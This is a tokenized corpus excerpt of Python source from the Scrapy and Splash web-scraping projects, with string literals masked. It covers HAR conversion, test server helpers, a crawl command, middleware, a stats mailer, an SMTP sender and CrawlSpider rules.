<NUM_LIT:100> ) ) ) <EOL> samples . append ( row ) <EOL> j2 . samples . write ( row ) <EOL> j2 . samples . flush ( ) <EOL> o = list ( j2 . samples . list ( ) ) <EOL> self . assertEqual ( len ( o ) , count ) <EOL> for r1 , r2 in zip ( samples , o ) : <EOL> self . assertEqual ( r1 , r2 ) <EOL> def test_jobsummary ( self ) : <EOL> js = self . project . jobsummary ( ) <EOL> self . assertEqual ( js . get ( '<STR_LIT>' ) , int ( self . project . projectid ) , js ) <EOL> self . assertEqual ( js . get ( '<STR_LIT>' ) , True , js ) <EOL> self . assertTrue ( '<STR_LIT>' in js , js ) <EOL> self . assertTrue ( '<STR_LIT>' in js , js ) <EOL> def test_bulkdata ( self ) : <EOL> j = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> for i in xrange ( <NUM_LIT:20> ) : <EOL> j . logs . info ( "<STR_LIT>" % i ) <EOL> j . items . write ( dict ( field1 = "<STR_LIT>" % i ) ) <EOL> j . requests . add ( "<STR_LIT>" % i , <EOL> <NUM_LIT:200> , '<STR_LIT:GET>' , <NUM_LIT:10> , None , <NUM_LIT:10> , <NUM_LIT> ) <EOL> for resourcename in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> resource = getattr ( j , resourcename ) <EOL> resource . flush ( ) <EOL> with failing_downloader ( resource ) : <EOL> downloaded = list ( resource . iter_values ( ) ) <EOL> self . assertEqual ( len ( downloaded ) , <NUM_LIT:20> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import base64 <EOL> from PyQt5 . QtCore import Qt , QVariant , QUrlQuery <EOL> from PyQt5 . QtNetwork import QNetworkRequest <EOL> import six <EOL> from splash . qtutils import ( <EOL> REQUEST_ERRORS_SHORT , <EOL> OPERATION_NAMES , <EOL> qt_header_items <EOL> ) <EOL> def headers2har ( request_or_reply ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> { <EOL> "<STR_LIT:name>" : bytes ( name ) . decode ( '<STR_LIT>' ) , <EOL> "<STR_LIT:value>" : bytes ( value ) . decode ( '<STR_LIT>' ) , <EOL> } <EOL> for name , value in qt_header_items ( request_or_reply ) <EOL> ] <EOL> def headers_size ( request_or_reply ) : <EOL> """<STR_LIT>""" <EOL> size = <NUM_LIT:0> <EOL> for name , value in qt_header_items ( request_or_reply ) : <EOL> size += name . size ( ) + <NUM_LIT:2> + value . size ( ) + <NUM_LIT:2> <EOL> return size <EOL> def request_cookies2har ( request ) : <EOL> """<STR_LIT>""" <EOL> cookies = request . header ( QNetworkRequest . CookieHeader ) <EOL> return cookies2har ( cookies ) <EOL> def reply_cookies2har ( reply ) : <EOL> """<STR_LIT>""" <EOL> cookies = reply . header ( QNetworkRequest . SetCookieHeader ) <EOL> return cookies2har ( cookies ) <EOL> def cookies2har ( cookies ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( cookies , QVariant ) : <EOL> cookies = cookies . toPyObject ( ) <EOL> return [ cookie2har ( cookie ) for cookie in ( cookies or [ ] ) ] <EOL> def cookie2har ( cookie ) : <EOL> """<STR_LIT>""" <EOL> cookie = { <EOL> "<STR_LIT:name>" : bytes ( cookie . name ( ) ) . decode ( '<STR_LIT:utf8>' , '<STR_LIT:replace>' ) , <EOL> "<STR_LIT:value>" : bytes ( cookie . value ( ) ) . decode ( '<STR_LIT:utf8>' , '<STR_LIT:replace>' ) , <EOL> "<STR_LIT:path>" : six . text_type ( cookie . path ( ) ) , <EOL> "<STR_LIT>" : six . text_type ( cookie . domain ( ) ) , <EOL> "<STR_LIT>" : six . text_type ( cookie . expirationDate ( ) . toString ( Qt . ISODate ) ) , <EOL> "<STR_LIT>" : cookie . isHttpOnly ( ) , <EOL> "<STR_LIT>" : cookie . isSecure ( ) , <EOL> } <EOL> if not cookie [ "<STR_LIT>" ] : <EOL> del cookie [ "<STR_LIT>" ] <EOL> return cookie <EOL> def querystring2har ( url ) : <EOL> return [ <EOL> { "<STR_LIT:name>" : six . text_type ( name ) , "<STR_LIT:value>" : six . text_type ( value ) } <EOL> for name , value in QUrlQuery ( url ) . queryItems ( ) <EOL> ] <EOL> def reply2har ( reply , include_content = False , binary_content = False ) : <EOL> """<STR_LIT>""" <EOL> res = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : reply_cookies2har ( reply ) , <EOL> "<STR_LIT>" : headers2har ( reply ) , <EOL> "<STR_LIT:content>" : { <EOL> "<STR_LIT:size>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : headers_size ( reply ) , <EOL> "<STR_LIT>" : not reply . error ( ) , <EOL> "<STR_LIT:url>" : reply . url ( ) . toString ( ) <EOL> } <EOL> content_type = reply . header ( QNetworkRequest . ContentTypeHeader ) <EOL> if content_type is not None : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] = six . text_type ( content_type ) <EOL> content_length = reply . header ( QNetworkRequest . ContentLengthHeader ) <EOL> if content_length is not None : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:size>" ] = content_length <EOL> status = reply . attribute ( QNetworkRequest . HttpStatusCodeAttribute ) <EOL> if status is not None : <EOL> res [ "<STR_LIT:status>" ] = int ( status ) <EOL> else : <EOL> res [ "<STR_LIT:status>" ] = <NUM_LIT:0> <EOL> status_text = reply . attribute ( QNetworkRequest . HttpReasonPhraseAttribute ) <EOL> if status_text is not None : <EOL> try : <EOL> res [ "<STR_LIT>" ] = bytes ( status_text , '<STR_LIT>' ) . decode ( '<STR_LIT>' ) <EOL> except TypeError : <EOL> res [ "<STR_LIT>" ] = bytes ( status_text ) . decode ( '<STR_LIT>' ) <EOL> else : <EOL> res [ "<STR_LIT>" ] = REQUEST_ERRORS_SHORT . get ( reply . error ( ) , "<STR_LIT:?>" ) <EOL> redirect_url = reply . attribute ( QNetworkRequest . RedirectionTargetAttribute ) <EOL> if redirect_url is not None : <EOL> res [ "<STR_LIT>" ] = six . text_type ( redirect_url . toString ( ) ) <EOL> else : <EOL> res [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> if include_content : <EOL> data = bytes ( reply . readAll ( ) ) <EOL> if binary_content : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:text>" ] = data <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:size>" ] = len ( data ) <EOL> else : <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:text>" ] = base64 . b64encode ( data ) <EOL> res [ "<STR_LIT:content>" ] [ "<STR_LIT:size>" ] = len ( data ) <EOL> return res <EOL> def request2har ( request , operation , outgoing_data = None ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> "<STR_LIT>" : OPERATION_NAMES . get ( operation , '<STR_LIT:?>' ) , <EOL> "<STR_LIT:url>" : six . text_type ( request . url ( ) . toString ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : request_cookies2har ( request ) , <EOL> "<STR_LIT>" : querystring2har ( request . url ( ) ) , <EOL> "<STR_LIT>" : headers2har ( request ) , <EOL> "<STR_LIT>" : headers_size ( request ) , <EOL> "<STR_LIT>" : outgoing_data . size ( ) if outgoing_data is not None else - <NUM_LIT:1> , <EOL> } </s>
<s> import os <EOL> class SentryLogger ( object ) : <EOL> def __init__ ( self ) : <EOL> try : <EOL> import raven <EOL> self . enabled = True <EOL> dsn = os . environ [ '<STR_LIT>' ] <EOL> if dsn . startswith ( '<STR_LIT>' ) : <EOL> dsn = dsn . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . client = raven . Client ( dsn ) <EOL> except ( ImportError , KeyError ) : <EOL> self . enabled = False <EOL> def capture ( self , failure ) : <EOL> if self . enabled : <EOL> self . client . captureException ( ( failure . type , failure . value , failure . getTracebackObject ( ) ) ) <EOL> capture = SentryLogger ( ) . capture </s>
<s> import random <EOL> import string <EOL> import sys , os , time , tempfile , shutil , socket , fcntl , signal <EOL> from subprocess import Popen , PIPE <EOL> try : <EOL> socket . getaddrinfo ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NON_EXISTING_RESOLVABLE = True <EOL> except socket . gaierror : <EOL> NON_EXISTING_RESOLVABLE = False <EOL> def get_testenv ( ) : <EOL> env = os . environ . copy ( ) <EOL> env [ '<STR_LIT>' ] = os . getcwd ( ) <EOL> return env <EOL> def get_ephemeral_port ( ) : <EOL> s = socket . socket ( ) <EOL> s . bind ( ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> return s . getsockname ( ) [ <NUM_LIT:1> ] <EOL> def _non_block_read ( output ) : <EOL> fd = output . fileno ( ) <EOL> fl = fcntl . fcntl ( fd , fcntl . F_GETFL ) <EOL> fcntl . fcntl ( fd , fcntl . F_SETFL , fl | os . O_NONBLOCK ) <EOL> try : <EOL> return output . read ( ) <EOL> except Exception : <EOL> return "<STR_LIT>" <EOL> def _wait_for_port ( portnum , delay = <NUM_LIT:0.1> , attempts = <NUM_LIT:100> ) : <EOL> while attempts > <NUM_LIT:0> : <EOL> s = socket . socket ( ) <EOL> if s . connect_ex ( ( '<STR_LIT:127.0.0.1>' , portnum ) ) == <NUM_LIT:0> : <EOL> s . close ( ) <EOL> return <EOL> time . sleep ( delay ) <EOL> attempts -= <NUM_LIT:1> <EOL> raise RuntimeError ( "<STR_LIT>" % portnum ) <EOL> class SplashServer ( object ) : <EOL> def __init__ ( self , logfile = None , proxy_profiles_path = None , <EOL> js_profiles_path = None , filters_path = None , portnum = None , <EOL> extra_args = None , verbosity = <NUM_LIT:3> ) : <EOL> self . logfile = logfile <EOL> self . proxy_profiles_path = proxy_profiles_path <EOL> self . js_profiles_path = js_profiles_path <EOL> self . filters_path = filters_path <EOL> self . verbosity = verbosity <EOL> self . portnum = portnum if portnum is not None else get_ephemeral_port ( ) <EOL> self . tempdir = tempfile . mkdtemp ( ) <EOL> self . extra_args = extra_args or [ ] <EOL> def __enter__ ( self ) : <EOL> args = [ sys . executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> args += [ '<STR_LIT>' , str ( self . portnum ) ] <EOL> args += [ '<STR_LIT>' , str ( self . verbosity ) ] <EOL> if self . logfile : <EOL> args += [ '<STR_LIT>' , self . logfile ] <EOL> if self . proxy_profiles_path : <EOL> args += [ '<STR_LIT>' , self . proxy_profiles_path ] <EOL> if self . js_profiles_path : <EOL> args += [ '<STR_LIT>' , self . js_profiles_path ] <EOL> if self . filters_path : <EOL> args += [ '<STR_LIT>' , self . filters_path ] <EOL> args . extend ( self . extra_args ) <EOL> self . proc = Popen ( args , env = get_testenv ( ) ) <EOL> self . proc . poll ( ) <EOL> if self . proc . returncode is not None : <EOL> msg = ( "<STR_LIT>" % <EOL> self . proc . returncode ) <EOL> raise RuntimeError ( msg ) <EOL> _wait_for_port ( self . portnum ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> if self . proc is not None : <EOL> self . proc . send_signal ( signal . SIGINT ) <EOL> self . proc . wait ( ) <EOL> self . proc = None <EOL> shutil . rmtree ( self . tempdir ) <EOL> def url ( self , path ) : <EOL> return "<STR_LIT>" % ( self . portnum , path . lstrip ( '<STR_LIT:/>' ) ) <EOL> class MockServer ( object ) : <EOL> def __init__ ( self , http_port = None , https_port = None , proxy_port = None , auth_proxy_port = None , auth_proxy_user = None ) : <EOL> self . http_port = http_port if http_port is not None else get_ephemeral_port ( ) <EOL> self . https_port = https_port if https_port is not None else get_ephemeral_port ( ) <EOL> self . proxy_port = proxy_port if proxy_port is not None else get_ephemeral_port ( ) <EOL> self . auth_proxy_port = auth_proxy_port if auth_proxy_port is not None else get_ephemeral_port ( ) <EOL> self . auth_proxy_user = auth_proxy_user <EOL> def __enter__ ( self ) : <EOL> self . proc = Popen ( [ <EOL> sys . executable , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , str ( self . http_port ) , <EOL> '<STR_LIT>' , str ( self . https_port ) , <EOL> '<STR_LIT>' , str ( self . proxy_port ) , <EOL> "<STR_LIT>" , str ( self . auth_proxy_port ) , <EOL> "<STR_LIT>" , str ( self . auth_proxy_user ) <EOL> ] , <EOL> env = get_testenv ( ) <EOL> ) <EOL> for port in ( self . http_port , self . https_port , self . proxy_port , self . auth_proxy_port ) : <EOL> _wait_for_port ( port ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . proc . kill ( ) <EOL> self . proc . wait ( ) <EOL> def url ( self , path , gzip = True , host = '<STR_LIT:localhost>' ) : <EOL> gzip_path = '<STR_LIT>' if not gzip else '<STR_LIT>' <EOL> return "<STR_LIT>" % ( <EOL> host , self . http_port , gzip_path , path . lstrip ( '<STR_LIT:/>' ) <EOL> ) <EOL> def https_url ( self , path ) : <EOL> return "<STR_LIT>" % ( self . https_port , path . lstrip ( '<STR_LIT:/>' ) ) <EOL> class TestServers ( object ) : <EOL> def __init__ ( self , logfile = None ) : <EOL> self . logfile = logfile <EOL> self . tmp_folder = tempfile . mkdtemp ( "<STR_LIT>" ) <EOL> self . proxy_profiles_path = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . js_profiles_path = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . filters_path = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . lua_modules = self . _copy_test_folder ( '<STR_LIT>' ) <EOL> self . lua_sandbox_allowed_modules = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . mock_http_port = get_ephemeral_port ( ) <EOL> self . mock_https_port = get_ephemeral_port ( ) <EOL> self . mock_proxy_port = get_ephemeral_port ( ) <EOL> self . mock_auth_proxy_port = get_ephemeral_port ( ) <EOL> self . mock_auth_proxy_user = "<STR_LIT>" . join ( random . choice ( string . ascii_letters ) for _ in range ( <NUM_LIT:20> ) ) <EOL> print ( "<STR_LIT>" % ( <EOL> self . mock_http_port , self . mock_https_port , self . mock_proxy_port , self . mock_auth_proxy_port ) ) <EOL> self . _fix_testproxy_port ( ) <EOL> def _copy_test_folder ( self , src , dst = None ) : <EOL> src_path = test_path ( src ) <EOL> dst_path = os . path . join ( self . tmp_folder , dst or src ) <EOL> shutil . copytree ( src_path , dst_path ) <EOL> return dst_path <EOL> def _fix_testproxy_port ( self ) : <EOL> filename = os . path . join ( self . proxy_profiles_path , u'<STR_LIT>' ) <EOL> with open ( filename , '<STR_LIT:rb>' ) as f : <EOL> data = f . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> data = data . replace ( u'<STR_LIT>' , str ( self . mock_proxy_port ) ) <EOL> with open ( filename , '<STR_LIT:wb>' ) as f : <EOL> f . write ( data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def __enter__ ( self ) : <EOL> self . mockserver = MockServer ( <EOL> self . mock_http_port , <EOL> self . mock_https_port , <EOL> self . mock_proxy_port , <EOL> self . mock_auth_proxy_port , <EOL> self . mock_auth_proxy_user <EOL> ) <EOL> self . mockserver . __enter__ ( ) <EOL> self . splashserver = SplashServer ( <EOL> logfile = self . logfile , <EOL> proxy_profiles_path = self . proxy_profiles_path , <EOL> js_profiles_path = self . js_profiles_path , <EOL> filters_path = self . filters_path , <EOL> extra_args = [ <EOL> '<STR_LIT>' , '<STR_LIT>' % self . lua_modules . rstrip ( '<STR_LIT:/>' ) , <EOL> '<STR_LIT>' , '<STR_LIT:;>' . join ( self . lua_sandbox_allowed_modules ) , <EOL> ] <EOL> ) <EOL> self . splashserver . __enter__ ( ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . splashserver . __exit__ ( None , None , None ) <EOL> self . mockserver . __exit__ ( None , None , None ) <EOL> shutil . rmtree ( self . tmp_folder ) <EOL> def test_path ( * args ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , * args ) </s>
<s> import os <EOL> from scrapy . commands import ScrapyCommand <EOL> from scrapy . utils . conf import arglist_to_dict <EOL> from scrapy . utils . python import without_none_values <EOL> from scrapy . exceptions import UsageError <EOL> class Command ( ScrapyCommand ) : <EOL> requires_project = True <EOL> def syntax ( self ) : <EOL> return "<STR_LIT>" <EOL> def short_desc ( self ) : <EOL> return "<STR_LIT>" <EOL> def add_options ( self , parser ) : <EOL> ScrapyCommand . add_options ( self , parser ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , default = [ ] , metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> def process_options ( self , args , opts ) : <EOL> ScrapyCommand . process_options ( self , args , opts ) <EOL> try : <EOL> opts . spargs = arglist_to_dict ( opts . spargs ) <EOL> except ValueError : <EOL> raise UsageError ( "<STR_LIT>" , print_help = False ) <EOL> if opts . output : <EOL> if opts . output == '<STR_LIT:->' : <EOL> self . settings . set ( '<STR_LIT>' , '<STR_LIT>' , priority = '<STR_LIT>' ) <EOL> else : <EOL> self . settings . set ( '<STR_LIT>' , opts . output , priority = '<STR_LIT>' ) <EOL> feed_exporters = without_none_values ( <EOL> self . settings . getwithbase ( '<STR_LIT>' ) ) <EOL> valid_output_formats = feed_exporters . keys ( ) <EOL> if not opts . output_format : <EOL> opts . output_format = os . path . splitext ( opts . output ) [ <NUM_LIT:1> ] . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> if opts . output_format not in valid_output_formats : <EOL> raise UsageError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( opts . output_format , <EOL> tuple ( valid_output_formats ) ) ) <EOL> self . settings . set ( '<STR_LIT>' , opts . output_format , priority = '<STR_LIT>' ) <EOL> def run ( self , args , opts ) : <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> raise UsageError ( ) <EOL> elif len ( args ) > <NUM_LIT:1> : <EOL> raise UsageError ( "<STR_LIT>" ) <EOL> spname = args [ <NUM_LIT:0> ] <EOL> self . crawler_process . crawl ( spname , ** opts . spargs ) <EOL> self . crawler_process . start ( ) </s>
<s> import warnings <EOL> from scrapy . exceptions import ScrapyDeprecationWarning <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ScrapyDeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> from scrapy . downloadermiddlewares . redirect import * </s>
<s> import warnings <EOL> from scrapy . exceptions import ScrapyDeprecationWarning <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ScrapyDeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> from scrapy . spiders import * </s>
<s> from __future__ import absolute_import <EOL> import re <EOL> import logging <EOL> import six <EOL> from w3lib import html <EOL> from scrapy . exceptions import NotConfigured <EOL> from scrapy . http import HtmlResponse <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AjaxCrawlMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , settings ) : <EOL> if not settings . getbool ( '<STR_LIT>' ) : <EOL> raise NotConfigured <EOL> self . lookup_bytes = settings . getint ( '<STR_LIT>' , <NUM_LIT> ) <EOL> @ classmethod <EOL> def from_crawler ( cls , crawler ) : <EOL> return cls ( crawler . settings ) <EOL> def process_response ( self , request , response , spider ) : <EOL> if not isinstance ( response , HtmlResponse ) or response . status != <NUM_LIT:200> : <EOL> return response <EOL> if request . method != '<STR_LIT:GET>' : <EOL> return response <EOL> if '<STR_LIT>' in request . meta : <EOL> return response <EOL> if not self . _has_ajax_crawlable_variant ( response ) : <EOL> return response <EOL> ajax_crawl_request = request . replace ( url = request . url + '<STR_LIT>' ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : ajax_crawl_request , '<STR_LIT>' : request } , <EOL> extra = { '<STR_LIT>' : spider } ) <EOL> ajax_crawl_request . meta [ '<STR_LIT>' ] = True <EOL> return ajax_crawl_request <EOL> def _has_ajax_crawlable_variant ( self , response ) : <EOL> """<STR_LIT>""" <EOL> body = response . text [ : self . lookup_bytes ] <EOL> return _has_ajaxcrawlable_meta ( body ) <EOL> _ajax_crawlable_re = re . compile ( six . u ( r'<STR_LIT>' ) ) <EOL> def _has_ajaxcrawlable_meta ( text ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in text : <EOL> return False <EOL> if '<STR_LIT:content>' not in text : <EOL> return False <EOL> text = html . remove_tags_with_content ( text , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> text = html . replace_entities ( text ) <EOL> text = html . remove_comments ( text ) <EOL> return _ajax_crawlable_re . search ( text ) is not None </s>
<s> """<STR_LIT>""" <EOL> from scrapy import signals <EOL> from scrapy . mail import MailSender <EOL> from scrapy . exceptions import NotConfigured <EOL> class StatsMailer ( object ) : <EOL> def __init__ ( self , stats , recipients , mail ) : <EOL> self . stats = stats <EOL> self . recipients = recipients <EOL> self . mail = mail <EOL> @ classmethod <EOL> def from_crawler ( cls , crawler ) : <EOL> recipients = crawler . settings . getlist ( "<STR_LIT>" ) <EOL> if not recipients : <EOL> raise NotConfigured <EOL> mail = MailSender . from_settings ( crawler . settings ) <EOL> o = cls ( crawler . stats , recipients , mail ) <EOL> crawler . signals . connect ( o . spider_closed , signal = signals . spider_closed ) <EOL> return o <EOL> def spider_closed ( self , spider ) : <EOL> spider_stats = self . stats . get_stats ( spider ) <EOL> body = "<STR_LIT>" <EOL> body += "<STR_LIT:\n>" . join ( "<STR_LIT>" % i for i in self . stats . get_stats ( ) . items ( ) ) <EOL> body += "<STR_LIT>" % spider . name <EOL> body += "<STR_LIT:\n>" . join ( "<STR_LIT>" % i for i in spider_stats . items ( ) ) <EOL> return self . mail . send ( self . recipients , "<STR_LIT>" % spider . name , body ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from six . moves import cStringIO as StringIO <EOL> import six <EOL> from email . utils import COMMASPACE , formatdate <EOL> from six . moves . email_mime_multipart import MIMEMultipart <EOL> from six . moves . email_mime_text import MIMEText <EOL> from six . moves . email_mime_base import MIMEBase <EOL> if six . PY2 : <EOL> from email . MIMENonMultipart import MIMENonMultipart <EOL> from email import Encoders <EOL> else : <EOL> from email . mime . nonmultipart import MIMENonMultipart <EOL> from email import encoders as Encoders <EOL> from twisted . internet import defer , reactor , ssl <EOL> logger = logging . getLogger ( __name__ ) <EOL> class MailSender ( object ) : <EOL> def __init__ ( self , smtphost = '<STR_LIT:localhost>' , mailfrom = '<STR_LIT>' , <EOL> smtpuser = None , smtppass = None , smtpport = <NUM_LIT> , smtptls = False , smtpssl = False , debug = False ) : <EOL> self . smtphost = smtphost <EOL> self . smtpport = smtpport <EOL> self . smtpuser = smtpuser <EOL> self . smtppass = smtppass <EOL> self . smtptls = smtptls <EOL> self . smtpssl = smtpssl <EOL> self . mailfrom = mailfrom <EOL> self . debug = debug <EOL> @ classmethod <EOL> def from_settings ( cls , settings ) : <EOL> return cls ( settings [ '<STR_LIT>' ] , settings [ '<STR_LIT>' ] , settings [ '<STR_LIT>' ] , <EOL> settings [ '<STR_LIT>' ] , settings . getint ( '<STR_LIT>' ) , <EOL> settings . getbool ( '<STR_LIT>' ) , settings . getbool ( '<STR_LIT>' ) ) <EOL> def send ( self , to , subject , body , cc = None , attachs = ( ) , mimetype = '<STR_LIT>' , charset = None , _callback = None ) : <EOL> if attachs : <EOL> msg = MIMEMultipart ( ) <EOL> else : <EOL> msg = MIMENonMultipart ( * mimetype . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) ) <EOL> msg [ '<STR_LIT>' ] = self . mailfrom <EOL> msg [ '<STR_LIT>' ] = COMMASPACE . join ( to ) <EOL> msg [ '<STR_LIT>' ] = formatdate ( localtime = True ) <EOL> msg [ '<STR_LIT>' ] = subject <EOL> rcpts = to [ : ] <EOL> if cc : <EOL> rcpts . extend ( cc ) <EOL> msg [ '<STR_LIT>' ] = COMMASPACE . join ( cc ) <EOL> if charset : <EOL> msg . set_charset ( charset ) <EOL> if attachs : <EOL> msg . attach ( MIMEText ( body , '<STR_LIT>' , charset or '<STR_LIT>' ) ) <EOL> for attach_name , mimetype , f in attachs : <EOL> part = MIMEBase ( * mimetype . split ( '<STR_LIT:/>' ) ) <EOL> part . set_payload ( f . read ( ) ) <EOL> Encoders . encode_base64 ( part ) <EOL> part . add_header ( '<STR_LIT>' , '<STR_LIT>' % attach_name ) <EOL> msg . attach ( part ) <EOL> else : <EOL> msg . set_payload ( body ) <EOL> if _callback : <EOL> _callback ( to = to , subject = subject , body = body , cc = cc , attach = attachs , msg = msg ) <EOL> if self . debug : <EOL> logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : to , '<STR_LIT>' : cc , '<STR_LIT>' : subject , <EOL> '<STR_LIT>' : len ( attachs ) } ) <EOL> return <EOL> dfd = self . _sendmail ( rcpts , msg . as_string ( ) ) <EOL> dfd . addCallbacks ( self . _sent_ok , self . _sent_failed , <EOL> callbackArgs = [ to , cc , subject , len ( attachs ) ] , <EOL> errbackArgs = [ to , cc , subject , len ( attachs ) ] ) <EOL> reactor . addSystemEventTrigger ( '<STR_LIT>' , '<STR_LIT>' , lambda : dfd ) <EOL> return dfd <EOL> def _sent_ok ( self , result , to , cc , subject , nattachs ) : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : to , '<STR_LIT>' : cc , '<STR_LIT>' : subject , <EOL> '<STR_LIT>' : nattachs } ) <EOL> def _sent_failed ( self , failure , to , cc , subject , nattachs ) : <EOL> errstr = str ( failure . value ) <EOL> logger . error ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : to , '<STR_LIT>' : cc , '<STR_LIT>' : subject , <EOL> '<STR_LIT>' : nattachs , '<STR_LIT>' : errstr } ) <EOL> def _sendmail ( self , to_addrs , msg ) : <EOL> from twisted . mail . smtp import ESMTPSenderFactory <EOL> msg = StringIO ( msg ) <EOL> d = defer . Deferred ( ) <EOL> factory = ESMTPSenderFactory ( self . smtpuser , self . smtppass , self . mailfrom , to_addrs , msg , d , heloFallback = True , requireAuthentication = False , requireTransportSecurity = self . smtptls ) <EOL> factory . noisy = False <EOL> if self . smtpssl : <EOL> reactor . connectSSL ( self . smtphost , self . smtpport , factory , ssl . ClientContextFactory ( ) ) <EOL> else : <EOL> reactor . connectTCP ( self . smtphost , self . smtpport , factory ) <EOL> return d </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import six <EOL> from scrapy . http import Request , HtmlResponse <EOL> from scrapy . utils . spider import iterate_spider_output <EOL> from scrapy . spiders import Spider <EOL> def identity ( x ) : <EOL> return x <EOL> class Rule ( object ) : <EOL> def __init__ ( self , link_extractor , callback = None , cb_kwargs = None , follow = None , process_links = None , process_request = identity ) : <EOL> self . link_extractor = link_extractor <EOL> self . callback = callback <EOL> self . cb_kwargs = cb_kwargs or { } <EOL> self . process_links = process_links <EOL> self . process_request = process_request <EOL> if follow is None : <EOL> self . follow = False if callback else True <EOL> else : <EOL> self . follow = follow <EOL> class CrawlSpider ( Spider ) : <EOL> rules = ( ) <EOL> def __init__ ( self , * a , ** kw ) : <EOL> super ( CrawlSpider , self ) . __init__ ( * a , ** kw ) <EOL> self . _compile_rules ( ) <EOL> def parse ( self , response ) : <EOL> return self . _parse_response ( response , self . parse_start_url , cb_kwargs = { } , follow = True ) <EOL> def parse_start_url ( self , response ) : <EOL> return [ ] <EOL> def process_results ( self , response , results ) : <EOL> return results <EOL> def _requests_to_follow ( self , response ) : <EOL> if not isinstance ( response , HtmlResponse ) : <EOL> return <EOL> seen = set ( ) <EOL> for n , rule in enumerate ( self . _rules ) : <EOL> links = [ lnk for lnk in rule . link_extractor . extract_links ( response ) <EOL> if lnk not in seen ] <EOL> if links and rule . process_links : <EOL> links = rule . process_links ( links ) <EOL> for link in links : <EOL> seen . add ( link ) <EOL> r = Request ( url = link . url , callback = self . _response_downloaded ) <EOL> r . meta . update ( rule = n , link_text = link . text ) <EOL> yield rule . process_request ( r ) <EOL> def _response_downloaded ( self , response ) : <EOL> rule = self . _rules [ response . meta [ '<STR_LIT>' ] ] <EOL> return self . _parse_response ( response , rule . callback , rule . cb_kwargs , rule . follow ) <EOL> def _parse_response ( self , response , callback , cb_kwargs , follow = True ) : <EOL> if callback : <EOL> cb_res = callback ( response , ** cb_kwargs ) or ( ) <EOL> cb_res = self . process_results ( response , cb_res ) <EOL> for requests_or_item in iterate_spider_output ( cb_res ) : <EOL> yield requests_or_item <EOL> if follow and self . _follow_links : <EOL> for request_or_item in self . _requests_to_follow ( response ) : <EOL> yield request_or_item <EOL> def _compile_rules ( self ) : <EOL> def get_method ( method ) : <EOL> if callable ( method ) : <EOL> return method <EOL> elif isinstance ( method , six . string_types ) : <EOL> return getattr ( self , method , None ) <EOL> self . _rules = [ copy . copy ( r ) for r in self . rules ] <EOL> for rule in self . _rules : <EOL> rule . callback = get_method ( rule . callback ) <EOL> rule . process_links = get_method ( rule . process_links ) <EOL> rule . process_request = get_method ( rule . process_request ) <EOL> @ classmethod <EOL> def from_crawler ( cls , crawler , * args , ** kwargs ) : <EOL> spider = super ( CrawlSpider , cls ) . 